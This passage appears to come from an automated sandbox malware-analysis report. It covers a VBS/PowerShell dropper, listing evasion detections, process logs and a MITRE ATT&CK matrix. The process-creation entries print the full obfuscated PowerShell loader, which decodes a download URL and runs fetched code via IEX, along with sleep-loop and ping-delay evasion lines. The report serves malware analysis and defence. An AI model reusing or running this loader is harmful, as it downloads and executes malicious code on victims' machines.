';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Potential evasive VBS script found (sleep loop)
      Source: Initial fileInitial file: Do While Langtidsplanen.Status = 0 WScript.Sleep 100
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4922Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4996Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -3689348814741908s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD272000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
      Source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD272000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7344.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#svigagtige dimerised oprettelsesdokumenter rhinodynia zetas #>;$desiringly147='grunted';<#iltelegrammet hemispheral acromelalgia deboshed corruptibleness #>;$masonically=$nervepatientens+$host.ui;if ($masonically) {$laengst++;}function jus($hovekatalogers){$saneringsmodent=$skrmplante+$hovekatalogers.'length'-$laengst; for( $isttes=4;$isttes -lt $saneringsmodent;$isttes+=5){$skovsvinerier++;$snrer210+=$hovekatalogers[$isttes];$skuebrdene='kundemdets';}$snrer210;}function hyperromanticism140($regelfaststtelsers){ & ($andantinoer) ($regelfaststtelsers);}$courtezanry=jus ' owlmbov.o unlz r niflusldiasl anoaday /non. ';$courtezanry+=jus ' ad5thro. ska0 adr dece(is.awrotaiinvanrad.dbracogawaw m,rsfren ch,pnondst,til rose1skr,0ungd. b t0ig,i;str parwnoneitra nfar,6krem4s,je; ber mot x ka.6s,at4ha,l;cykl baghrafstv itr: hol1 all3 it1 or.fugl0 ava)stri fyrigstegegenocomgakignao rre/as p2depr0 mis1calc0 spo0penk1side0 enf1retr weapfpropilaserremoe,kolfliv,obarbxblu /unf.1pol,3 unf1utrn. mb0bade ';$retspraksisens=jus 'kariu,rivsphytelet.rtana-unfra stygsmmeeborgntil tblac ';$miljforandringers=jus 'legahunivtenketkloapstats boo:recu/ergo/gae,gsolbohyd vfolkahumel ratlmahocfati.serpopaasrpitagbibe/r gnrbegae ird defnsta isamfnto lgeners indbf rsl.tatt .ydetr lr idtnm,dhecervs oma.sou.aasylscan iostr ';$croises=jus ' ,kr>nerv ';$andantinoer=jus ' resianameso ixviva ';$befogging='italiana';$recarbon='\arkaiserings.slg';hyperromanticism140 (jus 'forh$ empgpr,clag eofrueboms.am.nolover:nivea pidnvagta ispcthyrl disifrihssegriou,dsknu,1vrkb4e gl7,arv=a ab$ s ee.unincog vant :ae iaforfpterapker dnoncaconttwienaluge+arv,$,ambrstteeexcuc issakontr s,kb mayoweasnstub ');hyperromanticism140 (jus ' hec$defeg ln lr ckononab forate.elbrn :genoagrafuallet mulosa.se co.t svrtruboe bra= p s$unsom shaieme.lstyrjnulsfaarro m,mrdoryasyndn inbdanlirspe,inasan komg vodeyustrinfls spy.sprjs xap smrlva dibisetsub (well$ peacjewerretso s,di nitsesseeupshssydv)arb ');hyperromanticism140 (jus 'ndp [cyc n.ndieootht s,j.ger.sskoveud frrespvprohi u fcfedtesalvpphylosan.i op.ns.ort antmspilafjoln lauar liguprue chortuli]w nn:t.ed:ansts heebagecissku myorhelti rusturotyudvipsc dr.ygaoundstoro.o cryc ido tallhove da a=steg kaff[h monbesgetutotbird. ebysgerfeuni csweaudyseroverihomot picy,efrplnkorudstomaantbiltoromacafs.oc holcondtkavey kolprdtue s,e]tui :hypo:smaltamuclko ps n n1nond2 dep ');$miljforandringers=$autoette[0];$panspermic=(jus 'r od$trepg alalu.caoelecbeuryagstelfisk:spidtbstrekloasgrunthikkubeeld fessudskkc ierudp isv.jvualmn madi cebnstrugpoinsw.ntf traafredcvindi mpelgr nio det unoe pretmeine.urunamph=uzbenneonebolswslen- atmomalibcaatjsekaekr mcaarttdimi .eads ilyblabsafsttasseeyallm vrd.tripn chee sert ask.assuwtramewoo.bfodeco chlperoisp aeud,anvasotthie ');hyperromanticism140 ($panspermic);hyperromanticism140 (jus 'terp$nekst gr,elydss
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#svigagtige dimerised oprettelsesdokumenter rhinodynia zetas #>;$desiringly147='grunted';<#iltelegrammet hemispheral acromelalgia deboshed corruptibleness #>;$masonically=$nervepatientens+$host.ui;if ($masonically) {$laengst++;}function jus($hovekatalogers){$saneringsmodent=$skrmplante+$hovekatalogers.'length'-$laengst; for( $isttes=4;$isttes -lt $saneringsmodent;$isttes+=5){$skovsvinerier++;$snrer210+=$hovekatalogers[$isttes];$skuebrdene='kundemdets';}$snrer210;}function hyperromanticism140($regelfaststtelsers){ & ($andantinoer) ($regelfaststtelsers);}$courtezanry=jus ' owlmbov.o unlz r niflusldiasl anoaday /non. ';$courtezanry+=jus ' ad5thro. ska0 adr dece(is.awrotaiinvanrad.dbracogawaw m,rsfren ch,pnondst,til rose1skr,0ungd. b t0ig,i;str parwnoneitra nfar,6krem4s,je; ber mot x ka.6s,at4ha,l;cykl baghrafstv itr: hol1 all3 it1 or.fugl0 ava)stri fyrigstegegenocomgakignao rre/as p2depr0 mis1calc0 spo0penk1side0 enf1retr weapfpropilaserremoe,kolfliv,obarbxblu /unf.1pol,3 unf1utrn. mb0bade ';$retspraksisens=jus 'kariu,rivsphytelet.rtana-unfra stygsmmeeborgntil tblac ';$miljforandringers=jus 'legahunivtenketkloapstats boo:recu/ergo/gae,gsolbohyd vfolkahumel ratlmahocfati.serpopaasrpitagbibe/r gnrbegae ird defnsta isamfnto lgeners indbf rsl.tatt .ydetr lr idtnm,dhecervs oma.sou.aasylscan iostr ';$croises=jus ' ,kr>nerv ';$andantinoer=jus ' resianameso ixviva ';$befogging='italiana';$recarbon='\arkaiserings.slg';hyperromanticism140 (jus 'forh$ empgpr,clag eofrueboms.am.nolover:nivea pidnvagta ispcthyrl disifrihssegriou,dsknu,1vrkb4e gl7,arv=a ab$ s ee.unincog vant :ae iaforfpterapker dnoncaconttwienaluge+arv,$,ambrstteeexcuc issakontr s,kb mayoweasnstub ');hyperromanticism140 (jus ' hec$defeg ln lr ckononab forate.elbrn :genoagrafuallet mulosa.se co.t svrtruboe bra= p s$unsom shaieme.lstyrjnulsfaarro m,mrdoryasyndn inbdanlirspe,inasan komg vodeyustrinfls spy.sprjs xap smrlva dibisetsub (well$ peacjewerretso s,di nitsesseeupshssydv)arb ');hyperromanticism140 (jus 'ndp [cyc n.ndieootht s,j.ger.sskoveud frrespvprohi u fcfedtesalvpphylosan.i op.ns.ort antmspilafjoln lauar liguprue chortuli]w nn:t.ed:ansts heebagecissku myorhelti rusturotyudvipsc dr.ygaoundstoro.o cryc ido tallhove da a=steg kaff[h monbesgetutotbird. ebysgerfeuni csweaudyseroverihomot picy,efrplnkorudstomaantbiltoromacafs.oc holcondtkavey kolprdtue s,e]tui :hypo:smaltamuclko ps n n1nond2 dep ');$miljforandringers=$autoette[0];$panspermic=(jus 'r od$trepg alalu.caoelecbeuryagstelfisk:spidtbstrekloasgrunthikkubeeld fessudskkc ierudp isv.jvualmn madi cebnstrugpoinsw.ntf traafredcvindi mpelgr nio det unoe pretmeine.urunamph=uzbenneonebolswslen- atmomalibcaatjsekaekr mcaarttdimi .eads ilyblabsafsttasseeyallm vrd.tripn chee sert ask.assuwtramewoo.bfodeco chlperoisp aeud,anvasotthie ');hyperromanticism140 ($panspermic);hyperromanticism140 (jus 'terp$nekst gr,elydssJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information321
      Scripting      		Valid Accounts2
      Command and Scripting Interpreter      		321
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Application Layer Protocol      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
